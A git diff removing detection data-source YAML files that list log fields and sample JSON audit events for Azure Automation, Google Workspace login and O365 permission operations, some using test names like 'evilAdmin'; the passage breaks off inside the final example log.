-example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/runbooks/write", "scope": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourceGroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook"}, "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/", "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661194261", "nbf": "1661194261", "exp": "1661198249", "http://schemas.microsoft.com/claims/authnclassreference": "1", "aio": "AWQAm/8TAAAA3iMcbqqPPdXPATT7oalIKsh6wEFsyQ+zUVCshaLu77xsLlt067TtI11gy5hAx+z905hrX1VBehDGaedvEg2UF0BSbHVL9bJrry4zk3Xt+HNt5dTXDDgABOFuNB4QJBUW", "altsecid": "1:live.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences": "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "evilAdmin@contoso.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname": "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John", "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider": "live.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier": "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.", "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid": "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name": "contoso.com#evilAdmin@contoso.com", "uti": "YMAP5fOmMkuuBUgBe-Z5AA", "ver": "1.0", "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId": "49b945c0-966a-48d8-b79b-31f184544594", "description": "", "eventDataId": "303f17eb-10cb-458f-8a80-683f40f123a2", "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource": {"value": "Administrative", "localizedValue": "Administrative"}, "id": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook/events/303f17eb-10cb-458f-8a80-683f40f123a2/ticks/637967920541346086", "level": "Informational", "resourceGroupName": "resourceGroup1", "resourceProviderName": {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook", "operationId": "b6e30ace-986c-4735-980f-926db0b43336", "operationName": {"value": "Microsoft.Automation/automationAccounts/runbooks/write", "localizedValue": "Create or Update an Azure Automation Runbook"}, "properties": {"eventCategory": "Administrative", "entity": "/subscriptions/1aee0e3d-b75b-440a-a927-76f0552a14e6/resourcegroups/resourceGroup1/providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/runbooks/SuspiciousRunbook", "message": "Microsoft.Automation/automationAccounts/runbooks/write", "hierarchy": "1aee0e3d-b75b-440a-a927-76f0552a14e6"}, "status": {"value": "Succeeded", "localizedValue": "Succeeded"}, "subStatus": {"value": "", "localizedValue": ""}, "eventTimestamp": "2022-08-22T19:07:34.1346086Z", "submissionTimestamp": "2022-08-22T19:08:54.1547383Z", "subscriptionId": "1aee0e3d-b75b-440a-a927-76f0552a14e6"}'
diff --git a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_account.yml b/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_account.yml
deleted file mode 100644
index 74f9e42228..0000000000
--- a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_account.yml
+++ /dev/null
@@ -1,91 +0,0 @@
-event_name: Azure Audit Create or Update an Azure Automation account
-fields:
-- _time
-- authorization.action
-- authorization.scope
-- caller
-- channels
-- claims.aio
-- claims.altsecid
-- claims.appid
-- claims.appidacr
-- claims.aud
-- claims.exp
-- claims.groups
-- claims.http://schemas.microsoft.com/claims/authnclassreference
-- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
-- claims.http://schemas.microsoft.com/identity/claims/identityprovider
-- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
-- claims.http://schemas.microsoft.com/identity/claims/scope
-- claims.http://schemas.microsoft.com/identity/claims/tenantid
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
-- claims.iat
-- claims.ipaddr
-- claims.iss
-- claims.name
-- claims.nbf
-- claims.puid
-- claims.rh
-- claims.uti
-- claims.ver
-- claims.wids
-- claims.xms_tcdt
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- eventDataId
-- eventName.localizedValue
-- eventName.value
-- eventSource.localizedValue
-- eventSource.value
-- eventTimestamp
-- host
-- id
-- index
-- level
-- linecount
-- object
-- object_id
-- object_path
-- operationId
-- operationName.localizedValue
-- operationName.value
-- product
-- properties.entity
-- properties.eventCategory
-- properties.hierarchy
-- properties.message
-- punct
-- resourceGroupName
-- resourceProviderName.localizedValue
-- resourceProviderName.value
-- resourceUri
-- source
-- sourcetype
-- splunk_server
-- status
-- status.localizedValue
-- status.value
-- subStatus.value
-- submissionTimestamp
-- subscriptionId
-- timeendpos
-- timestartpos
-- user
-- user_name
-- vendor
-- vendor_product
-- vendor_res_code
-example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/write", "scope": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount"}, "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/", "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661179930", "nbf": "1661179930", "exp": "1661185179", "http://schemas.microsoft.com/claims/authnclassreference": "1", "aio": "AWQAm/8TAAAATFEszAxfULi02mHZwJPr322a2w4m7xjhs9xgc61bVQITM6lcvJI17c8SKQGIWgIA0FysfS1bmLHdxImNfT26qJ5Sfc5UdTncHkz3UYu+AvgCW1gg1mRxOZEFXYdIlQ/h", "altsecid": "1:live.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences": "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "evilAdmin@contoso.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname": "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John", "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider": "live.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier": "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.", "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid": "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name": "contoso.com#evilAdmin@contoso.com", "uti": "OyNAqM760kmqzxVr6jwtAA", "ver": "1.0", "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId": "59e3de3b-b8c6-4360-9bc5-f094ebce6422", "description": "", "eventDataId": "b0a0bf02-57e5-4eb3-a36d-f2681d874637", "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource": {"value": "Administrative", "localizedValue": "Administrative"}, "id": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount/events/b0a0bf02-57e5-4eb3-a36d-f2681d874637/ticks/637967777618694806", "level": "Informational", "resourceGroupName": "ResourceGroup1", "resourceProviderName": {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount", "operationId": "6a420172-1ccd-4144-ac12-3095b4019ed5", "operationName": {"value": "Microsoft.Automation/automationAccounts/write", "localizedValue": "Create or Update an Azure Automation account"}, "properties": {"eventCategory": "Administrative", "entity": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount", "message": "Microsoft.Automation/automationAccounts/write", "hierarchy": "67165197-75ea-4ca3-96a5-3e23868eacd0"}, "status": {"value": "Succeeded", "localizedValue": "Succeeded"}, "subStatus": {"value": "", "localizedValue": ""}, "eventTimestamp": "2022-08-22T15:09:21.8694806Z", "submissionTimestamp": "2022-08-22T15:10:51.152208Z", "subscriptionId": "67165197-75ea-4ca3-96a5-3e23868eacd0"}'
diff --git a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_webhook.yml b/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_webhook.yml
deleted file mode 100644
index 8e4233a8ea..0000000000
--- a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_webhook.yml
+++ /dev/null
@@ -1,100 +0,0 @@
-event_name: Azure Audit Create or Update an Azure Automation webhook
-fields:
-- _time
-- authorization.action
-- authorization.scope
-- caller
-- channels
-- claims.aio
-- claims.altsecid
-- claims.appid
-- claims.appidacr
-- claims.aud
-- claims.exp
-- claims.groups
-- claims.http://schemas.microsoft.com/claims/authnclassreference
-- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
-- claims.http://schemas.microsoft.com/identity/claims/identityprovider
-- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
-- claims.http://schemas.microsoft.com/identity/claims/scope
-- claims.http://schemas.microsoft.com/identity/claims/tenantid
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
-- claims.iat
-- claims.ipaddr
-- claims.iss
-- claims.name
-- claims.nbf
-- claims.puid
-- claims.rh
-- claims.uti
-- claims.ver
-- claims.wids
-- claims.xms_tcdt
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- eventDataId
-- eventName.localizedValue
-- eventName.value
-- eventSource.localizedValue
-- eventSource.value
-- eventTimestamp
-- host
-- httpRequest.clientIpAddress
-- httpRequest.clientRequestId
-- httpRequest.method
-- id
-- index
-- level
-- linecount
-- object
-- object_id
-- object_path
-- operationId
-- operationName.localizedValue
-- operationName.value
-- product
-- properties.entity
-- properties.eventCategory
-- properties.hierarchy
-- properties.message
-- properties.serviceRequestId
-- properties.statusCode
-- punct
-- resourceGroupName
-- resourceProviderName.localizedValue
-- resourceProviderName.value
-- resourceUri
-- result
-- result_id
-- source
-- sourcetype
-- splunk_server
-- src
-- status
-- status.localizedValue
-- status.value
-- subStatus.localizedValue
-- subStatus.value
-- submissionTimestamp
-- subscriptionId
-- timeendpos
-- timestartpos
-- user
-- user_name
-- vendor
-- vendor_product
-- vendor_res_code
-example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/webhooks/write", "scope": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook"}, "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/", "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661287859", "nbf": "1661287859", "exp": "1661293423", "http://schemas.microsoft.com/claims/authnclassreference": "1", "aio": "AWQAm/8TAAAAEendcgWjYQFuDhNNhoecwU3dpXjjenSsIvjamk77+TjLK/o1xkFGcFb1A+OVyuY+xefe0X39n8lx1iFWFqGo0GSNNKhm9OQcv/0UyXiaNIbKD7wisgQhAa9DoIyObMpO", "altsecid": "1:contoso.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences": "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "evilAdmin@contosol.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname": "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John", "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider": "contoso.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier": "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.", "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid": "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name": "contoso.com#evilAdmin@contoso.com", "uti": "epgtY-85CUeb6aJpaE0KAQ", "ver": "1.0", "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId": "74e18a58-ee2e-40de-890d-de0c155f7086", "description": "", "eventDataId": "35b9db88-8041-413e-8dd7-f8dc243eafdd", "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource": {"value": "Administrative", "localizedValue": "Administrative"}, "httpRequest": {"clientRequestId": "6934b40a-c11f-4379-9ef1-c6fa3cee5015", "clientIpAddress": "190.0.0.1", "method": "PUT"}, "id": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook/events/35b9db88-8041-413e-8dd7-f8dc243eafdd/ticks/637968850422707386", "level": "Informational", "resourceGroupName": "eventhub_rg", "resourceProviderName": {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook", "operationId": "74e18a58-ee2e-40de-890d-de0c155f7086", "operationName": {"value": "Microsoft.Automation/automationAccounts/webhooks/write", "localizedValue": "Create or Update an Azure Automation webhook"}, "properties": {"statusCode": "Created", "serviceRequestId": null, "eventCategory": "Administrative", "entity": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook", "message": "Microsoft.Automation/automationAccounts/webhooks/write", "hierarchy": "e0c00901-96b2-4151-80f7-746e24c03e98"}, "status": {"value": "Succeeded", "localizedValue": "Succeeded"}, "subStatus": {"value": "Created", "localizedValue": "Created (HTTP Status Code: 201)"}, "eventTimestamp": "2022-08-23T20:57:22.2707386Z", "submissionTimestamp": "2022-08-23T20:58:54.2071536Z", "subscriptionId": "e0c00901-96b2-4151-80f7-746e24c03e98"}'
diff --git a/data_sources/cloud/event_sources/Google_Workspace_login_failure.yml b/data_sources/cloud/event_sources/Google_Workspace_login_failure.yml
deleted file mode 100644
index ff29e025f0..0000000000
--- a/data_sources/cloud/event_sources/Google_Workspace_login_failure.yml
+++ /dev/null
@@ -1,38 +0,0 @@
-event_name: Google Workspace login_failure
-fields:
-- _time
-- actor.email
-- actor.profileId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- etag
-- event.name
-- event.parameters{}.multiValue{}
-- event.parameters{}.name
-- event.parameters{}.value
-- event.type
-- eventtype
-- host
-- id.applicationName
-- id.customerId
-- id.time
-- id.uniqueQualifier
-- index
-- ipAddress
-- kind
-- linecount
-- punct
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-example_log: '{"kind": "admin#reports#activity", "id": {"time": "2022-10-12T01:05:35.119Z", "uniqueQualifier": "720229394436", "applicationName": "login", "customerId": "C046r85ir"}, "etag": "\"JCPRxFaiNR1s5TJ6ecIH8OpGdY4efiOYXbIB65itOzY/_lixtTooT11WXorGf6w6ElN0m0g\"", "actor": {"email": "user29@daftpunk.com", "profileId": "114679690119024644513"}, "ipAddress": "141.254.89.27", "event": {"type": "login", "name": "login_failure", "parameters": [{"name": "login_type", "value": "unknown"}, {"name": "login_challenge_method", "multiValue": ["password"]}]}}'
diff --git a/data_sources/cloud/event_sources/Google_Workspace_login_success.yml b/data_sources/cloud/event_sources/Google_Workspace_login_success.yml
deleted file mode 100644
index e443b32f74..0000000000
--- a/data_sources/cloud/event_sources/Google_Workspace_login_success.yml
+++ /dev/null
@@ -1,36 +0,0 @@
-event_name: Google Workspace login_success
-fields:
-- _time
-- actor.email
-- actor.profileId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- etag
-- event.name
-- event.parameters{}.boolValue
-- event.parameters{}.multiValue{}
-- event.parameters{}.name
-- event.parameters{}.value
-- event.type
-- host
-- id.applicationName
-- id.customerId
-- id.time
-- id.uniqueQualifier
-- index
-- ipAddress
-- kind
-- linecount
-- punct
-- source
-- sourcetype
-- splunk_server
-- timeendpos
-- timestartpos
-example_log: '{"kind": "admin#reports#activity", "id": {"time": "2022-10-13T20:57:35.833Z", "uniqueQualifier": "437744618349", "applicationName": "login", "customerId": "C046r85ir"}, "etag": "\"JCPRxFaiNR1s5TJ6ecIH8OpGdY4efiOYXbIB65itOzY/OgAbD-Tz8hSD1vUJWw7NLiJ5SF4\"", "actor": {"email": "user1@splunkresearch.com", "profileId": "112184723778873345717"}, "ipAddress": "45.23.129.123", "event": {"type": "login", "name": "login_success", "parameters": [{"name": "login_type", "value": "google_password"}, {"name": "login_challenge_method", "multiValue": ["password", "password", "password", "password", "password"]}, {"name": "is_suspicious", "boolValue": false}]}}'
diff --git a/data_sources/cloud/event_sources/O365_Add-MailboxPermission.yml b/data_sources/cloud/event_sources/O365_Add-MailboxPermission.yml
deleted file mode 100644
index 84ac90b468..0000000000
--- a/data_sources/cloud/event_sources/O365_Add-MailboxPermission.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-event_name: O365 Add-MailboxPermission
-fields:
-- _time
-- AccessRights
-- AppId
-- ClientAppId
-- ClientIP
-- CreationTime
-- ExternalAccess
-- Id
-- Identity
-- InheritanceType
-- ObjectId
-- Operation
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- Parameters{}.Name
-- Parameters{}.Value
-- RecordType
-- ResultStatus
-- SessionId
-- User
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"AppId": "", "ClientAppId": "", "ClientIP": "18.159.234.121:30395", "CreationTime": "2020-12-15T10:18:53", "ExternalAccess": false, "Id": "bb6e31a3-e98f-493d-bbff-08d8a0e2d2b0", "ObjectId": "jhernan", "Operation": "Add-MailboxPermission", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "OrganizationName": "rodsoto.onmicrosoft.com", "OriginatingServer": "PH0PR14MB4341 (15.20.3654.025)", "Parameters": [{"Name": "Identity", "Value": "jhernan"}, {"Name": "User", "Value": "Patrick Bareiss"}, {"Name": "AccessRights", "Value": "FullAccess"}, {"Name": "InheritanceType", "Value": "All"}], "RecordType": 1, "ResultStatus": "True", "SessionId": "2be46662-a743-4a05-8744-c2f75f886512", "UserId": "pbareiss@rodsoto.onmicrosoft.com", "UserKey": "10032001020A3408", "UserType": 2, "Version": 1, "Workload": "Exchange"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_app_role_assignment_grant_to_user.yml b/data_sources/cloud/event_sources/O365_Add_app_role_assignment_grant_to_user.yml
deleted file mode 100644
index 473a95fd40..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_app_role_assignment_grant_to_user.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: O365 Add app role assignment grant to user.
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- ClientIP
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- extendedAuditEventCategory
-- extended_properties
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"Actor": [{"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID": "10037FFEA938FB92", "Type": 3}, {"ID": "74658136-14ec-4630-ad9b-26e160ff0fc6", "Type": 2}, {"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress": "40.124.84.4", "AzureActiveDirectoryEventType": 1, "ClientIP": "40.124.84.4", "CreationTime": "2021-01-19T22:21:39", "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value": "User"}], "Id": "8b9e5417-c310-4382-89da-c0f25c5c0576", "InterSystemsId": "85c80877-c529-4487-8f44-48760767cc6c", "IntraSystemId": "6fc81447-9c94-4734-8bd7-307bb699c04e", "ModifiedProperties": [{"Name": "AppRole.Id", "NewValue": "97edced9-9f34-4eef-9b49-84a5ebcd5167", "OldValue": ""}, {"Name": "AppRole.Value", "NewValue": "arn:aws:iam::111111111111:role/rodonmicrotestrole,arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft", "OldValue": ""}, {"Name": "AppRole.DisplayName", "NewValue": "rodonmicrotestrole,rodsotoonmicrosoft", "OldValue": ""}, {"Name": "User.ObjectID", "NewValue": "7646f1a9-620c-4630-b5e4-b02838be5562", "OldValue": ""}, {"Name": "User.UPN", "NewValue": "vagrant@rodsoto.onmicrosoft.com", "OldValue": ""}, {"Name": "User.PUID", "NewValue": "100320010972E450", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88", "OldValue": ""}], "ObjectId": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88", "Operation": "Add app role assignment grant to user.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_9fd10db9-dfe2-4d74-a724-c837eb8764d9", "Type": 2}, {"ID": "9fd10db9-dfe2-4d74-a724-c837eb8764d9", "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "Amazon Web Services (AWS)", "Type": 1}, {"ID": "3e71560f-3e31-45ab-b439-46328fe55b88", "Type": 2}, {"ID": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88", "Type": 4}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "UserId": "rodsoto@rodsoto.onmicrosoft.com", "UserKey": "10037FFEA938FB92@rodsoto.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_app_role_assignment_to_service_principal.yml b/data_sources/cloud/event_sources/O365_Add_app_role_assignment_to_service_principal.yml
deleted file mode 100644
index ad185d9dee..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_app_role_assignment_to_service_principal.yml
+++ /dev/null
@@ -1,71 +0,0 @@
-event_name: O365 Add app role assignment to service principal.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2024-02-08T21:49:53", "Id": "a6bee61d-8b3f-42e1-b4fa-778fb05c43ac", "Operation": "Add app role assignment to service principal.", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 8, "ResultStatus": "Success", "UserKey": "Not Available", "UserType": 4, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com", "UserId": "ServicePrincipal_fc8c8125-bc0c-499d-8344-e53c6e3caa81", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Darwin 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20 21:28:58 PST 2023; root:xnu-10002.81.5~7/RELEASE_X86_64; en-US) PowerShell/7.3.4\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\"}"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties": [{"Name": "AppRole.Id", "NewValue": "dc890d15-9560-4a4c-9b7f-a736ec74ec40", "OldValue": ""}, {"Name": "AppRole.Value", "NewValue": "full_access_as_app", 